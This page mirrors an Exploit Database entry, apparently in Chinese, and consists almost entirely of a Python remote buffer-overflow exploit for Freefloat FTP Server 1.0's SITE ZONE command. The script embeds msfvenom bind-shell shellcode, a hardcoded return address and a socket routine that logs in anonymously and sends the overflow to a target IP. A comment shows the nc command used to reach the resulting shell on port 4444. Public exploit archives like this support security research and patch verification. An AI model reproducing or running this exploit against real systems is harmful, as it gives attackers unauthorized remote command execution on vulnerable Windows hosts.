Freefloat FTP Server 1.0 – ‘SITE ZONE’ Remote Buffer Overflow

• Exploit Database
• 15 阅读

• 作者： Luis Noriega
  日期： 2016-11-04
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40711/

• #!/usr/bin/env python
  #-*- coding: utf-8 -*-
  
  # Exploit Title: FreeFloat FTP Server BoF SITE ZONE Command
  # Date: 04/11/2016
  # Exploit Author: Luis Noriega
  # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
  # Version: 1.0
  # Tested on: Windows XP Profesional V. 5.1 Service Pack 3
  # CVE : n/a
  
  
  import socket
  
  # shellcode with metasploit:
  # msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
  # nc 192.168.1.150 4444
  
  ret = "\x2F\x1D\xF1\x77" # GDI32.dll
  shellcode = ("\xb8\x78\xa3\x16\x0c\xdd\xc2\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
  "\x53\x31\x43\x12\x83\xeb\xfc\x03\x3b\xad\xf4\xf9\x47\x59\x7a"
  "\x01\xb7\x9a\x1b\x8b\x52\xab\x1b\xef\x17\x9c\xab\x7b\x75\x11"
  "\x47\x29\x6d\xa2\x25\xe6\x82\x03\x83\xd0\xad\x94\xb8\x21\xac"
  "\x16\xc3\x75\x0e\x26\x0c\x88\x4f\x6f\x71\x61\x1d\x38\xfd\xd4"
  "\xb1\x4d\x4b\xe5\x3a\x1d\x5d\x6d\xdf\xd6\x5c\x5c\x4e\x6c\x07"
  "\x7e\x71\xa1\x33\x37\x69\xa6\x7e\x81\x02\x1c\xf4\x10\xc2\x6c"
  "\xf5\xbf\x2b\x41\x04\xc1\x6c\x66\xf7\xb4\x84\x94\x8a\xce\x53"
  "\xe6\x50\x5a\x47\x40\x12\xfc\xa3\x70\xf7\x9b\x20\x7e\xbc\xe8"
  "\x6e\x63\x43\x3c\x05\x9f\xc8\xc3\xc9\x29\x8a\xe7\xcd\x72\x48"
  "\x89\x54\xdf\x3f\xb6\x86\x80\xe0\x12\xcd\x2d\xf4\x2e\x8c\x39"
  "\x39\x03\x2e\xba\x55\x14\x5d\x88\xfa\x8e\xc9\xa0\x73\x09\x0e"
  "\xc6\xa9\xed\x80\x39\x52\x0e\x89\xfd\x06\x5e\xa1\xd4\x26\x35"
  "\x31\xd8\xf2\xa0\x39\x7f\xad\xd6\xc4\x3f\x1d\x57\x66\xa8\x77"
  "\x58\x59\xc8\x77\xb2\xf2\x61\x8a\x3d\xed\x2d\x03\xdb\x67\xde"
  "\x45\x73\x1f\x1c\xb2\x4c\xb8\x5f\x90\xe4\x2e\x17\xf2\x33\x51"
  "\xa8\xd0\x13\xc5\x23\x37\xa0\xf4\x33\x12\x80\x61\xa3\xe8\x41"
  "\xc0\x55\xec\x4b\xb2\xf6\x7f\x10\x42\x70\x9c\x8f\x15\xd5\x52"
  "\xc6\xf3\xcb\xcd\x70\xe1\x11\x8b\xbb\xa1\xcd\x68\x45\x28\x83"
  "\xd5\x61\x3a\x5d\xd5\x2d\x6e\x31\x80\xfb\xd8\xf7\x7a\x4a\xb2"
  "\xa1\xd1\x04\x52\x37\x1a\x97\x24\x38\x77\x61\xc8\x89\x2e\x34"
  "\xf7\x26\xa7\xb0\x80\x5a\x57\x3e\x5b\xdf\x67\x75\xc1\x76\xe0"
  "\xd0\x90\xca\x6d\xe3\x4f\x08\x88\x60\x65\xf1\x6f\x78\x0c\xf4"
  "\x34\x3e\xfd\x84\x25\xab\x01\x3a\x45\xfe")
  
  
  buffer = '\x90' * 30 + shellcode
  buffer1 = '\x4C' * 242 + ret + buffer + '\x41' * (749-len(buffer))
  print "Sending Buffer"
  
  s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
  connect = s.connect(('192.168.1.150', 21))
  s.recv(1024)
  s.send('USER anonymous\r\n')
  s.recv(1024)
  s.send('PASS anonymous\r\n')
  s.recv(1024)
  s.send('SITE ZONE' + buffer1 + '\r\n')
  s.close()